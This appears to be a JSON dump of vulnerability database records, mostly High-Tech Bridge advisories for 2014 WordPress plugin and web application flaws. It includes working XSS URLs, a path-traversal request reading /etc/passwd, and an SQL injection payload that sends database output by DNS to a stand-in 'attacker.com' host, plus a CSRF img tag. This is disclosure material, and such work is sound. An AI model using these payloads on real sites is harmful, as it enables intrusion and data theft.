"GLSA-201505-03", "href": "https://security.gentoo.org/glsa/201505-03", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315 \n \n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb /%29;%3C/script%3E \n \n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29; %3C/script%3E \n \n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/scri pt%3E \n \n\n", "reporter": "High-Tech Bridge", "published": "2014-09-10T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Photo Gallery WordPress plugin", "version": "1.1.30", "operator": "le"}], "cvelist": ["CVE-2014-6315"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-09-10T00:00:00", "id": "HTB23232", "href": "https://www.htbridge.com/advisory/HTB23232", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:20", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138 \n \nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_f eed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n\n", "reporter": "High-Tech Bridge", "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Google Calendar Events WordPress plugin", "version": "2.0.1", "operator": "le"}], "cvelist": ["CVE-2014-7138"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-10-07T00:00:00", "id": "HTB23235", "href": "https://www.htbridge.com/advisory/HTB23235", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:12", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed. \n \n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139 \n \n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%2 2%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22 %29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\n", "reporter": "High-Tech Bridge", "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Two XSS in Contact Form DB WordPress plugin", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Contact Form DB WordPress plugin", "version": "2.8.13", "operator": "le"}], "cvelist": ["CVE-2014-7139"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-09-26T00:00:00", "id": "HTB23233", "href": "https://www.htbridge.com/advisory/HTB23233", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:32", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735 \n \nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it. \n \nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Eal ert%28%27immuniweb%27%29;%3C/script%3E \n \n\n", "reporter": "High-Tech Bridge", "published": "2014-06-25T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in MyWebSQL", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MyWebSQL", "version": "3.4", "operator": "le"}], "cvelist": ["CVE-2014-4735"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-06-25T00:00:00", "id": "HTB23221", "href": "https://www.htbridge.com/advisory/HTB23221", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-09-24T14:46:28", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system. \n \n \n1) Path Traversal in webEdition: CVE-2014-5258 \n \nThe vulnerability exists due to insufficient sanitization of the \"file\" HTTP GET parameter in \"/webEdition/showTempFile.php\" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. \"../\") and read contents of arbitrary files on the target system with privileges of the web server. \n \nThe exploitation example below display contents of \"/etc/passwd\" file: \n \nhttp://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd \n \nSuccessful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application. \n", "reporter": "High-Tech Bridge", "published": "2014-08-06T00:00:00", "type": "htbridge", "title": "Path Traversal in webEdition", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "webEdition", "version": "6.3.8.0", "operator": "le"}], "cvelist": ["CVE-2014-5258"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-09-17T00:00:00", "id": "HTB23227", "href": "https://www.htbridge.com/advisory/HTB23227", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-23T23:08:24", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n \n \n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 \n \n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.: \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20l oad_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,C HAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899% 29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR% 28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%2 9,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \n \n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.: \n \n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28sele ct%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%2 9%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR %2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29 ,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%2 8111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\n", "reporter": "High-Tech Bridge", "published": "2014-09-03T00:00:00", "type": "htbridge", "title": "Two SQL Injections in All In One WP Security WordPress plugin", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "All In One WP Security WordPress plugin", "version": "3.8.2", "operator": "le"}], "cvelist": ["CVE-2014-6242"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-09-18T00:00:00", "id": "HTB23231", "href": "https://www.htbridge.com/advisory/HTB23231", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered XSS vulnerability in Textpattern, which can be exploited to perform Cross-Site Scripting attacks against users of vulnerable application. \n \n1) Reflected Cross-Site Scripting (XSS) in Textpattern: CVE-2014-4737 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via URI after \"/textpattern/setup/index.php\" script that is not deleted by default. \n \nA remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Further exploitation of the vulnerability may allow an attacker to perform phishing attacks and potentially gain unauthorized access to the website. \n \nThe following exploitation example uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/textpattern/setup/index.php/%22%3E%3Cscript%3Ealert%28immuniwe b%29;%3C/script%3E/index.php\n", "reporter": "High-Tech Bridge", "published": "2014-07-09T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in Textpattern", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Textpattern", "version": "4.5.5", "operator": "le"}], "cvelist": ["CVE-2014-4737"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-09-21T00:00:00", "id": "HTB23223", "href": "https://www.htbridge.com/advisory/HTB23223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:32", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;% 22%3E\n", "reporter": "High-Tech Bridge", "published": "2014-08-20T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in MODX Revolution", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MODX Revolution", "version": "2.3.1-pl", "operator": "le"}], "cvelist": ["CVE-2014-5451"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-09-16T00:00:00", "id": "HTB23229", "href": "https://www.htbridge.com/advisory/HTB23229", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}], "wpvulndb": [{"lastseen": "2018-09-17T19:25:49", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7139", "http://packetstormsecurity.com/files/128625/", "http://seclists.org/bugtraq/2014/Oct/46", "https://www.htbridge.com/advisory/HTB23233"], "description": "WordPress Vulnerability - Contact Form DB 2.8.13 - 2 x Cross-Site Scripting (XSS)\n", "reporter": "ethicalhack3r", "published": "2014-10-09T00:00:00", "type": "wpvulndb", "title": "Contact Form DB 2.8.13 - 2 x Cross-Site Scripting (XSS)", "enchantments": {"score": {"modified": "2018-09-17T19:25:49", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "contact-form-7-to-database-extension", "version": "2.8.16", "operator": "lt"}], "cvelist": ["CVE-2014-7139"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2015-05-15T00:00:00", "id": "WPVDB-ID:7641", "href": "https://wpvulndb.com/vulnerabilities/7641", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-17T19:26:01", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6315", "http://packetstormsecurity.com/files/128518/", "https://secunia.com/advisories/61649/", "https://www.htbridge.com/advisory/HTB23232"], "description": "WordPress Vulnerability - Photo Gallery 1.1.30 - Cross Site Scripting\n", "reporter": "pvdl", "published": "2015-02-01T00:00:00", "type": "wpvulndb", "title": "Photo Gallery 1.1.30 - Cross Site Scripting", "enchantments": {"score": {"modified": "2018-09-17T19:26:01", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "photo-gallery", "version": "1.1.31", "operator": "lt"}], "cvelist": ["CVE-2014-6315"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2015-05-15T00:00:00", "id": "WPVDB-ID:7776", "href": "https://wpvulndb.com/vulnerabilities/7776", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-17T19:25:49", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6243", "http://seclists.org/bugtraq/2014/Oct/45", "https://www.htbridge.com/advisory/HTB23234"], "description": "WordPress Vulnerability - EWWW Image Optimizer 2.0.1 - Cross-Site Scripting (XSS)\n", "reporter": "ethicalhack3r", "published": "2014-10-09T00:00:00", "type": "wpvulndb", "title": "EWWW Image Optimizer 2.0.1 - Cross-Site Scripting (XSS)", "enchantments": {"score": {"modified": "2018-09-17T19:25:49", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "ewww-image-optimizer", "version": "2.0.2", "operator": "lt"}], "cvelist": ["CVE-2014-6243"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2015-05-15T00:00:00", "id": "WPVDB-ID:7640", "href": "https://wpvulndb.com/vulnerabilities/7640", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-17T19:25:52", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"], "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6242", "http://www.securityfocus.com/archive/1/533519", "https://www.htbridge.com/advisory/HTB23231"], "description": "WordPress Vulnerability - All In One WP Security plugin 3.8.2 - 2xSQL Injections\n", "reporter": "ethicalhack3r", "published": "2014-09-26T00:00:00", "type": "wpvulndb", "title": "All In One WP Security plugin 3.8.2 - 2xSQL Injections", "enchantments": {"score": {"modified": "2018-09-17T19:25:52", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "all-in-one-wp-security-and-firewall", "version": "3.8.3", "operator": "lt"}], "cvelist": ["CVE-2014-6242"], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "modified": "2015-05-15T00:00:00", "id": "WPVDB-ID:7600", "href": "https://wpvulndb.com/vulnerabilities/7600", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T17:30:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 65445\r\nCVE ID: CVE-2014-1608\r\n\r\nMantisBT\u662f\u57fa\u4e8eWeb\u7684bug\u8ddf\u8e2a\u7cfb\u7edf\u3002\r\n\r\nMantisBT 1.2.16\u4e4b\u524d\u7248\u672c\uff0capi/soap/mc_file_api.php\u5185\u7684mci_file_get\u51fd\u6570\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u8fd9\u53ef\u4f7f\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7mc_issue_attachment_get SOAP\u8bf7\u6c42\u5185\u7684\u7279\u5236envelope\u6807\u7b7e\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u4efb\u610fSQL\u547d\u4ee4\u3002\n0\nmantisbt mantisbt < 1.2.16\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mantisbt.org/", "reporter": "Root", "published": "2014-03-19T00:00:00", "title": "MantisBT 'mc_issue_attachment_get' SOAP API SQL\u6ce8\u5165\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1608"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-03-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61854", "id": "SSV:61854", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T13:12:28", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-09-29T00:00:00", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6242"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87286", "id": "SSV:87286", "sourceData": "\n Advisory ID: HTB23231\r\nProduct: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy\r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014\r\nVendor Patch: September 12, 2014\r\nPublic Disclosure: September 24, 2014\r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium\r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector.\r\n \r\n \r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n \r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\n \r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n \r\n<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to All In One WP Security 3.8.3\r\n \r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\r\n \r\n-----------------------------------------------------------------------------------------------\r\n 